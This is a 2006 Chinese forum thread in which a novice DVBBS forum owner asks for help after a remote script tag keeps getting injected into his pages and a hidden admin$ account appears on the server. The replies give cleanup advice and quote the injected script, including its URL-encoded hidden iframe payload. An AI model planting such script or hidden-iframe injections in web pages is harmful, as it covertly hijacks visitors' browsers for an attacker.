| 服务器出现了个 admin$ 帐号 |
| [ 来源:ITWENKU 时间:2006-11-10 15:39:36 | 浏览:641人次
] |
| |
|
本人是个菜鸟级别的"站长", 直接就使用了个DVBBS搞个论坛.有点小人气.
可近两个月来老是网页上莫名其妙的被人给挂上一段 " <script src=http://www.waigua9999.com/1.js></script> ".
我就禁止了论坛的所有上传功能.
但最近我查看服务器上的日志,每天都有 admin$ 执行个什么东西.
然后 " <script src=http://www.waigua9999.com/1.js></script> ".就又出现在网页上了.
对服务器我一点都不懂.
这点小事情不想找大公安,谁叫我是菜鸟呢,别欺负也是没有办法.
求高手指点. 谢谢
DVBBS如果下载了不改动设置,尤其是数据库部分,是很危险的.另外服务器的各种补丁要下全,防火墙要设计好,当初我第一个服务器做起来没到3天,就被3个人光顾了,呵呵,开始都这样
我的系统是 2003 打了最新的所有补丁.
sql 2000 sp4
IIS 目录现在只给了读权限.
在线急.
谢谢各位!
那估计你的数据库被下载了或者利用其漏洞入侵,高人们来鉴定一下
先把那任务取消了吧,然后修改你数据库设置,修改数据库密码以及管理员密码
看看系统帐号里有没有陌生高权限帐号,用反木马程序搜索你的网站目录,恐怕是有ASP 木马页面.
你的那个由sql漏洞,只要会一点漏洞攻击的都能做到
不是高手的话在自己服务器上直接用dvbbs很危险地
倒不如用个不出名的BBS系统
删除这个帐号呀
然后修改一下论坛或网站的源代码,自己好好查查
admin$ 这个帐号在帐号管理里面看不到.
我是看日志才发现这个的.
admin$ 是一个隐藏帐号!!正常情况下是看不到的,黑客常用这个方法保持自己在服务器的最高权限,你可以在cmd 下输入net user admin$ 查看 此帐号的信息!
你可以在cmd下通过 net user admin$ /del删除这个帐号!
至于
<script src=http://www.waigua9999.com/1.js></script>这句是调用远程地址http://www.waigua9999.com/1.js,文件内容如下:
————————————————————————————————————-
document.write('<Iframe src="http://%77%61%69%67%75%61%39%39%39%39%2E%63%6F%6D/index.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');
——————————————————————————————————————————
“%77%61%69%67%75%61%39%39%39%39%2E%63%6F%”是 “waigua9999.com”,是经过unicode编码的,这个文件的目的是让访问你网站的人同时访问waigua9999.com,达到刷流量的目的!
可见你是被人黑了:首先你应该检查你dvbbs的版本,打上最新的补丁,还有你检查论坛管理员帐号密码是不是默认的?(admin admin888)还有你是否安装了ser-u ftp服务器?这个冬冬是黑客用来提升权限的。你可以用“思易asp木马追捕”查杀你的网站中的asp木马!!如果你是和别人公用一台主机的(例如合租、虚拟主机),那还要检查是不是别人的网站漏洞,导致黑客能够跨站攻击你的网站!你先 作这几点检查吧!只要清楚了asp木马就好办多了
|
|
 |
推荐文章 |
|
